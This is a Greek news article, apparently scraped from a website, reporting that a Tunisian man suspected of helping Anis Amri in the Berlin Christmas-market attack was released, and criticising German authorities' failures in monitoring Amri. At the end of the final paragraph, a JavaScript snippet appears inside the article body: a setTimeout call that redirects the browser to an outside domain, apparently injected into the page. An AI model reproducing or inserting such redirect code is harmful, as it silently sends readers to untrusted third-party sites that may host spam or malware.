Ελεύθερος άλλος ένας λάθος ύποπτος για συνέργεια στο μακελειό στο Βερολίνο

0
6

 

Δεν εξεδόθη ένταλμα σύλληψης από την Εισαγγελία του Βερολίνου κατά υπόπτου για συνέργεια στο μακελειό του Βεορλίνου, καθώς ο αριθμός του τηλεφώνου του βρέθηκε στο κινητό του Άνις Άμρι.

0 40χρονος Τυνήσιος και φερόμενος ως συνεργός αφέθηκε τελικά ελεύθερος δεδομένου ότι δεν προέκυψαν ενοχοποιητικά στοιχεία μετά τις σχετικές έρευνες στην κατοικία του στο Βερολίνο. Ακόμη ένα λάθος προστίθεται στη σωρεία λαθών και παραλείψεων των γερμανικών αρχών για τα οποία δέχονται σφοδρή κριτική.

Στην ανακοίνωση από την Εισαγγελία αναφέρεται ότι οι έρευνες για τον δράστη της αιματηρής επίθεσης στη χριστουγεννιάτικη αγορά του Βερολίνου είχαν διακοπεί την περασμένη άνοιξη, αν και από την παρακολούθησή του είχε προκύψει ότι έψαχνε όπλα και είχε σχεδιάσει ληστείες για την εξεύρεση χρημάτων για την αγορά τους.

Συγκεκριμένα ο Άμρι είχε ζητήσει ήδη το 2015 από κάποιον πληροφοριοδότη των μυστικών υπηρεσιών, κάτι το οποίο φυσικά δεν γνώριζε, βοήθεια για την προμήθεια όπλου. Η πληροφορία από μόνη της δεν ήταν αρκετή να τους θέσει σε εγρήγορση καθώς ο Άμρι είχε ένα προφίλ όχι φανατικού μουσουλμάνου. Δεν πήγαινε συστηματικά σε τζαμί και δεν νήστευε στο ραμαζάνι, ενώ έπαιρνε ο ίδιος αλλά και πουλούσε κοκαΐνη.

Επίσης ήταν γνωστό στις αρχές ότι ο Άμρι πηγαινοερχόταν ελεύθερος μεταξύ διάφορων πόλεων της Βόρειας Ρηνανίας-Βεστφαλίας και του Βερολίνου, αλλά κατέθετε και αιτήματα για κοινωνική βοήθεια, τα οποία εγκρίνονταν, συναντούσε ακραίους ισλαμιστές και είχε επαφές ακόμη και με το Ισλαμικό Κράτος. Εντούτοις οι αρχές ολιγώρησαν και η ίδια η Εισαγγελία μάλιστα δεν θεώρησε ότι συντρέχει λόγος συνέχισης της παρακολούθησής του και ούτε φυσικά σύλληψής του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here